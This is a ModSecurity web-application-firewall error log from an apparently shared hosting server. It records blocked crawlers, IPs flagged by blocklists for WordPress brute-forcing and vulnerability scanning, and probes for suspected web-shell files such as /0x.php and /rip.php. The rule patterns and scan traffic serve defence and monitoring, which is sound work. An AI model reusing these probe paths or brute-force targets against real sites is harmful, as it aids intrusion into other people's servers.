[Tue May 26 16:30:35.244890 2026] [security2:error] [pid 808625:tid 808863] [client 185.191.171.18:12682] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahV9UzEl_SBaWibfDmpJigAAAGw"]
[Tue May 26 16:30:35.245026 2026] [security2:error] [pid 808625:tid 808863] [client 185.191.171.18:12682] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahV9UzEl_SBaWibfDmpJigAAAGw"]
[Tue May 26 16:30:35.520858 2026] [security2:error] [pid 808625:tid 808843] [client 2.58.56.163:51621] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "consola.co"] [uri "/xmlrpc.php"] [unique_id "ahV9UzEl_SBaWibfDmpJiwAAAFg"]
[Tue May 26 16:30:35.962910 2026] [security2:error] [pid 808625:tid 808849] [client 2.58.56.163:64633] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV9UzEl_SBaWibfDmpJlgAAAF4"]
[Tue May 26 16:30:36.273635 2026] [security2:error] [pid 808625:tid 808874] [client 2.58.56.163:55174] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VDEl_SBaWibfDmpJnAAAAHc"]
[Tue May 26 16:30:36.634054 2026] [security2:error] [pid 808625:tid 808815] [client 2.58.56.163:64141] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VDEl_SBaWibfDmpJrgAAADw"]
[Tue May 26 16:30:36.989995 2026] [security2:error] [pid 808625:tid 808769] [client 2.58.56.163:59869] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VDEl_SBaWibfDmpJsgAAAA4"]
[Tue May 26 16:30:37.089566 2026] [security2:error] [pid 808625:tid 808779] [client 43.173.178.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV9VDEl_SBaWibfDmpJpAAAABg"]
[Tue May 26 16:30:37.097168 2026] [security2:error] [pid 808625:tid 808762] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9VDEl_SBaWibfDmpJogAAAAc"]
[Tue May 26 16:30:37.194672 2026] [security2:error] [pid 808625:tid 808826] [client 43.173.177.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV9VDEl_SBaWibfDmpJqwAAAEc"]
[Tue May 26 16:30:37.307725 2026] [security2:error] [pid 808625:tid 808758] [client 2.58.56.163:62540] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VTEl_SBaWibfDmpJtwAAAAM"]
[Tue May 26 16:30:37.553411 2026] [security2:error] [pid 808625:tid 808814] [client 20.116.59.164:54431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahV9VTEl_SBaWibfDmpJuAAAADs"]
[Tue May 26 16:30:37.553544 2026] [security2:error] [pid 808625:tid 808814] [client 20.116.59.164:54431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahV9VTEl_SBaWibfDmpJuAAAADs"]
[Tue May 26 16:30:37.617462 2026] [security2:error] [pid 808625:tid 808806] [client 2.58.56.163:49395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VTEl_SBaWibfDmpJuQAAADM"]
[Tue May 26 16:30:37.928799 2026] [security2:error] [pid 808625:tid 808792] [client 2.58.56.163:50151] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VTEl_SBaWibfDmpJxwAAACU"]
[Tue May 26 16:30:38.239530 2026] [security2:error] [pid 808625:tid 808800] [client 2.58.56.163:64265] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VjEl_SBaWibfDmpJzgAAAC0"]
[Tue May 26 16:30:38.559664 2026] [security2:error] [pid 808625:tid 808815] [client 2.58.56.163:51539] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VjEl_SBaWibfDmpJ2AAAADw"]
[Tue May 26 16:30:38.870353 2026] [security2:error] [pid 808625:tid 808829] [client 2.58.56.163:58249] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VjEl_SBaWibfDmpJ3gAAAEo"]
[Tue May 26 16:30:38.914381 2026] [security2:error] [pid 808625:tid 808850] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9VjEl_SBaWibfDmpJ1AAAAF8"]
[Tue May 26 16:30:39.031201 2026] [security2:error] [pid 808625:tid 808825] [client 114.119.136.12:58175] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/omr/420190158.pdf"] [unique_id "ahV9VzEl_SBaWibfDmpJ4QAAAEY"], referer: https://www.ucdc.co.in/upload/omr/?C=D%3BO%3DA
[Tue May 26 16:30:39.192362 2026] [security2:error] [pid 808625:tid 808807] [client 2.58.56.163:65151] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VzEl_SBaWibfDmpJ6QAAADQ"]
[Tue May 26 16:30:39.505763 2026] [security2:error] [pid 808625:tid 808845] [client 2.58.56.163:55768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VzEl_SBaWibfDmpJ8QAAAFo"]
[Tue May 26 16:30:39.556988 2026] [security2:error] [pid 808625:tid 808875] [client 209.99.189.98:49943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/images/images/cache.php"] [unique_id "ahV9VzEl_SBaWibfDmpJ8AAAAHg"], referer: www.google.com
[Tue May 26 16:30:39.831550 2026] [security2:error] [pid 808625:tid 808814] [client 2.58.56.163:56005] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV9VzEl_SBaWibfDmpJ8wAAADs"]
[Tue May 26 16:30:39.868451 2026] [security2:error] [pid 808625:tid 808806] [client 114.119.140.239:45165] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "krishnawoodworks.com"] [uri "/images/kww-office-receptiondesk.jpg"] [unique_id "ahV9VzEl_SBaWibfDmpJ9AAAADM"], referer: http://krishnawoodworks.com/images/kww-office-receptiondesk.jpg
[Tue May 26 16:30:40.901330 2026] [security2:error] [pid 808625:tid 808782] [client 20.116.59.164:37768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV9WDEl_SBaWibfDmpKCwAAABs"]
[Tue May 26 16:30:40.901453 2026] [security2:error] [pid 808625:tid 808782] [client 20.116.59.164:37768] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV9WDEl_SBaWibfDmpKCwAAABs"]
[Tue May 26 16:30:41.619241 2026] [security2:error] [pid 808625:tid 808880] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9WTEl_SBaWibfDmpKDgAAAH0"]
[Tue May 26 16:30:42.470679 2026] [security2:error] [pid 808625:tid 808639] [remote 5.42.158.148:57590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV9WjEl_SBaWibfDmpKJAAAIw0"]
[Tue May 26 16:30:43.285326 2026] [security2:error] [pid 808625:tid 808830] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9WjEl_SBaWibfDmpKKgAAAEs"]
[Tue May 26 16:30:44.827752 2026] [security2:error] [pid 808625:tid 808766] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9XDEl_SBaWibfDmpKTAAAAAs"]
[Tue May 26 16:30:44.858677 2026] [security2:error] [pid 808625:tid 808866] [client 209.99.189.98:50359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/images/images/cache.php"] [unique_id "ahV9XDEl_SBaWibfDmpKVQAAAG8"], referer: www.google.com
[Tue May 26 16:30:45.164831 2026] [security2:error] [pid 808625:tid 808825] [client 20.116.59.164:20236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/o.php"] [unique_id "ahV9XTEl_SBaWibfDmpKXAAAAEY"]
[Tue May 26 16:30:45.164940 2026] [security2:error] [pid 808625:tid 808825] [client 20.116.59.164:20236] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/o.php"] [unique_id "ahV9XTEl_SBaWibfDmpKXAAAAEY"]
[Tue May 26 16:30:45.513796 2026] [security2:error] [pid 808625:tid 808657] [remote 209.42.19.17:44648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV9XTEl_SBaWibfDmpKYAAAax8"]
[Tue May 26 16:30:46.264531 2026] [security2:error] [pid 808625:tid 808656] [remote 18.190.7.192:41470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahV9XjEl_SBaWibfDmpKcAAAYh4"]
[Tue May 26 16:30:47.559105 2026] [security2:error] [pid 808625:tid 808794] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9XjEl_SBaWibfDmpKgAAAACc"]
[Tue May 26 16:30:48.364433 2026] [security2:error] [pid 808625:tid 808875] [client 43.173.176.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV9YDEl_SBaWibfDmpKpgAAAHg"]
[Tue May 26 16:30:49.185671 2026] [security2:error] [pid 808625:tid 808846] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9YDEl_SBaWibfDmpKrAAAAFs"]
[Tue May 26 16:30:50.575431 2026] [security2:error] [pid 808625:tid 808820] [client 20.116.59.164:37776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahV9YjEl_SBaWibfDmpK1wAAAEE"]
[Tue May 26 16:30:50.575568 2026] [security2:error] [pid 808625:tid 808820] [client 20.116.59.164:37776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahV9YjEl_SBaWibfDmpK1wAAAEE"]
[Tue May 26 16:30:50.980087 2026] [security2:error] [pid 808625:tid 808675] [remote 95.216.117.13:44780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV9YjEl_SBaWibfDmpK3gAAUzE"]
[Tue May 26 16:30:51.505190 2026] [security2:error] [pid 808625:tid 808783] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9YjEl_SBaWibfDmpK2gAAABw"]
[Tue May 26 16:30:52.731416 2026] [security2:error] [pid 808625:tid 808869] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ZDEl_SBaWibfDmpK8wAAAHI"]
[Tue May 26 16:30:55.302651 2026] [security2:error] [pid 808625:tid 808817] [client 185.251.19.135:46439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 135.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV9ZzEl_SBaWibfDmpLMwAAAD4"]
[Tue May 26 16:30:55.320338 2026] [security2:error] [pid 808625:tid 808833] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ZjEl_SBaWibfDmpLKwAAAE4"]
[Tue May 26 16:30:56.406838 2026] [security2:error] [pid 808625:tid 808752] [remote 74.7.241.15:46760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-fm-areyou.php"] [unique_id "ahV9aDEl_SBaWibfDmpLSgAAEX4"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:30:56.654666 2026] [security2:error] [pid 808625:tid 808850] [client 14.187.170.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9aDEl_SBaWibfDmpLRgAAAF8"]
[Tue May 26 16:30:57.165220 2026] [security2:error] [pid 808625:tid 808783] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9aDEl_SBaWibfDmpLUAAAABw"]
[Tue May 26 16:30:58.256504 2026] [security2:error] [pid 808625:tid 808856] [client 20.116.59.164:47536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV9ajEl_SBaWibfDmpLcgAAAGU"]
[Tue May 26 16:30:58.256604 2026] [security2:error] [pid 808625:tid 808856] [client 20.116.59.164:47536] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV9ajEl_SBaWibfDmpLcgAAAGU"]
[Tue May 26 16:30:59.401365 2026] [security2:error] [pid 808625:tid 808806] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ajEl_SBaWibfDmpLfAAAADM"]
[Tue May 26 16:31:01.184564 2026] [core:crit] [pid 808625:tid 808882] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:31:01.330704 2026] [security2:error] [pid 808625:tid 808797] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9bDEl_SBaWibfDmpLmAAAACo"]
[Tue May 26 16:31:02.805099 2026] [security2:error] [pid 808625:tid 808870] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9bjEl_SBaWibfDmpLsQAAAHM"]
[Tue May 26 16:31:04.630264 2026] [security2:error] [pid 808625:tid 808880] [client 20.116.59.164:27117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/s.php"] [unique_id "ahV9cDEl_SBaWibfDmpL2gAAAH0"]
[Tue May 26 16:31:04.630381 2026] [security2:error] [pid 808625:tid 808880] [client 20.116.59.164:27117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/s.php"] [unique_id "ahV9cDEl_SBaWibfDmpL2gAAAH0"]
[Tue May 26 16:31:05.209075 2026] [security2:error] [pid 808625:tid 808791] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9cDEl_SBaWibfDmpL3gAAACQ"]
[Tue May 26 16:31:07.104830 2026] [security2:error] [pid 808625:tid 808855] [client 47.128.30.3:64522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.omshriinfrastructures.com"] [uri "/robots.txt"] [unique_id "ahV9czEl_SBaWibfDmpMDQAAAGQ"]
[Tue May 26 16:31:07.541106 2026] [security2:error] [pid 808625:tid 808795] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9cjEl_SBaWibfDmpMDAAAACg"]
[Tue May 26 16:31:09.129817 2026] [security2:error] [pid 808625:tid 808697] [remote 163.223.13.54:55970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV9dDEl_SBaWibfDmpMMQAAFkc"]
[Tue May 26 16:31:09.579860 2026] [security2:error] [pid 808625:tid 808845] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9dTEl_SBaWibfDmpMNAAAAFo"]
